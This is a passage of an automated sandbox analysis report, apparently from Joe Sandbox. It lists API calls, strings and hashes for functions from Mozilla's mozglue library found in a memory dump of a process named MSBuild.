                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A351B075705BA2AFDB11AF388D44A2E3BFCEB462567104829E819E3E45EF34CC048F65
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CAC582D), ref: 6CAFCC27
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CAC582D), ref: 6CAFCC3D
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CB2FE98,?,?,?,?,?,6CAC582D), ref: 6CAFCC56
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CAC582D), ref: 6CAFCC6C
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CAC582D), ref: 6CAFCC82
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CAC582D), ref: 6CAFCC98
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAC582D), ref: 6CAFCCAE
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CAFCCC4
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CAFCCDA
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CAFCCEC
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CAFCCFE
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CAFCD14
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CAFCD82
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CAFCD98
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CAFCDAE
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CAFCDC4
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CAFCDDA
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CAFCDF0
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CAFCE06
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CAFCE1C
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CAFCE32
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CAFCE48
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CAFCE5E
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CAFCE74
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CAFCE8A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: strcmp
                                                                                                                                                                                                                                                                            • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                                                                            • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                                                                            • Opcode ID: d028806d586291d00d1782798d26cf53c991150f2342015f461ae52c117253b4
                                                                                                                                                                                                                                                                            • Instruction ID: 5a6b822708df98f30b911da01f916ecf93b4c46d68b7c29677d3667c531deeba
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d028806d586291d00d1782798d26cf53c991150f2342015f461ae52c117253b4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47517495A452B512FB2431176D10BFF1408EF5225EF14483AF92DA3E80FA39D68B86F7
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAC4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CAC44B2,6CB3E21C,6CB3F7F8), ref: 6CAC473E
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAC4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CAC474A
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CAC44BA
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CAC44D2
                                                                                                                                                                                                                                                                            • InitOnceExecuteOnce.KERNEL32(6CB3F80C,6CABF240,?,?), ref: 6CAC451A
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CAC455C
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 6CAC4592
                                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(6CB3F770), ref: 6CAC45A2
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000008), ref: 6CAC45AA
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000018), ref: 6CAC45BB
                                                                                                                                                                                                                                                                            • InitOnceExecuteOnce.KERNEL32(6CB3F818,6CABF240,?,?), ref: 6CAC4612
                                                                                                                                                                                                                                                                            • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CAC4636
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(user32.dll), ref: 6CAC4644
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CAC466D
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC469F
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC46AB
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC46B2
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC46B9
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC46C0
                                                                                                                                                                                                                                                                            • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CAC46CD
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 6CAC46F1
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CAC46FD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                                                                            • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                                                                            • API String ID: 1702738223-3894940629
                                                                                                                                                                                                                                                                            • Opcode ID: 39c9f54a8b6eeee8cb775b9714d323bd3818444418fa98f8d6797293dd1d1887
                                                                                                                                                                                                                                                                            • Instruction ID: e41274454a8785cc5f66c928153341bb7624ad33a7f475e4923c043246f9cf79
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39c9f54a8b6eeee8cb775b9714d323bd3818444418fa98f8d6797293dd1d1887
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 246117B0700398EFEB208F64CC09BA97BB8EF46309F088599E90C9B641D7759985CF52
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CAB3217
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CAB3236
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: FreeLibrary.KERNEL32 ref: 6CAB324B
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: __Init_thread_footer.LIBCMT ref: 6CAB3260
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CAB327F
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CAB328E
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CAB32AB
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CAB32D1
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CAB32E5
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CAB32F7
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CAC9675
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC9697
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CAC96E8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CAC9707
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC971F
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CAC9773
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CAC97B7
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CAC97D0
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CAC97EB
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CAC9824
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                                                                            • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                            • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB0D4F0
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB0D4FC
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB0D52A
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB0D530
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB0D53F
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB0D55F
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CB0D585
                                                                                                                                                                                                                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CB0D5D3
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB0D5F9
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB0D605
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB0D652
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB0D658
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CB0D667
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB0D6A2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2206442479-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CAC4A68), ref: 6CAF945E
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CAF9470
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CAF9482
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: __Init_thread_footer.LIBCMT ref: 6CAF949F
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CAFEC84
                                                                                                                                                                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CAFEC8C
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CAF94EE
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CAF9508
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CAFECA1
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CB3F4B8), ref: 6CAFECAE
                                                                                                                                                                                                                                                                            • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CAFECC5
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CB3F4B8), ref: 6CAFED0A
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CAFED19
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6CAFED28
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CAFED2F
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CB3F4B8), ref: 6CAFED59
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • [I %d/%d] profiler_ensure_started, xrefs: 6CAFEC94
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                                            • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                                                                            • API String ID: 4057186437-125001283
                                                                                                                                                                                                                                                                            • Opcode ID: 35196275f394a7e301f3eeee5f925fed76e365aa58fa3cf1e6dcc08e3195362f
                                                                                                                                                                                                                                                                            • Instruction ID: 0cfa34ff086a49e21b5e4a1aa6df2543a6cd79e29da0795af1fcbb383adb4ed2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35196275f394a7e301f3eeee5f925fed76e365aa58fa3cf1e6dcc08e3195362f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F210275600524ABDF109F28D908A9E3739EB4636DF144210FD2C87B81DB31984BCBF1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAB3492
                                                                                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAB34A9
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAB34EF
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CAB350E
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAB3522
                                                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6CAB3552
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAB357C
                                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAB3592
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB89: EnterCriticalSection.KERNEL32(6CB3E370,?,?,?,6CAB34DE,6CB3F6CC,?,?,?,?,?,?,?,6CAB3284), ref: 6CAEAB94
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB89: LeaveCriticalSection.KERNEL32(6CB3E370,?,6CAB34DE,6CB3F6CC,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAEABD1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 3634367004-706389432
                                                                                                                                                                                                                                                                            • Opcode ID: 3406647288093e54549eb8835a8178154af8f09ddd440f423d21bbbc89549c74
                                                                                                                                                                                                                                                                            • Instruction ID: c6ff694b0d585461509558a1772a9741b4de38db6312c46f9df7a5b047ae9e66
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3406647288093e54549eb8835a8178154af8f09ddd440f423d21bbbc89549c74
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B731F675B01215AFDF20DFB8CA48EAE77B9FB45304F144519E549E3690DB70A944CF60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3009372454-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4f899b9250748cc2e25e65c2fcf07b466ffbd44bf0ee38af5cbbb2ca00518699
                                                                                                                                                                                                                                                                            • Instruction ID: 7dfee9e6bec6dd4fca0cce600d53366a11d1640d073cc18fa5de5077e6187691
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f899b9250748cc2e25e65c2fcf07b466ffbd44bf0ee38af5cbbb2ca00518699
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BB1F371A005518FDB18DF7CC9A476D77BAAF42328F184669E416EBB86DB3098C4CB81
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1192971331-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8670aea69b487aed863c185d98982dbc6db741ffeea8eab4900692212355b43a
                                                                                                                                                                                                                                                                            • Instruction ID: 2dec6f563a1b99c1bc3553f8c995f8d6176ff461166d1f16fd22bc7dad7f7b02
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8670aea69b487aed863c185d98982dbc6db741ffeea8eab4900692212355b43a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 053172B1904B558FDB00AF7DD64826EBBF0FF85305F014A2DE98987255EB749448CB82
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB08273), ref: 6CB09D65
                                                                                                                                                                                                                                                                            • free.MOZGLUE(6CB08273,?), ref: 6CB09D7C
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?), ref: 6CB09D92
                                                                                                                                                                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CB09E0F
                                                                                                                                                                                                                                                                            • free.MOZGLUE(6CB0946B,?,?), ref: 6CB09E24
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?), ref: 6CB09E3A
                                                                                                                                                                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CB09EC8
                                                                                                                                                                                                                                                                            • free.MOZGLUE(6CB0946B,?,?,?), ref: 6CB09EDF
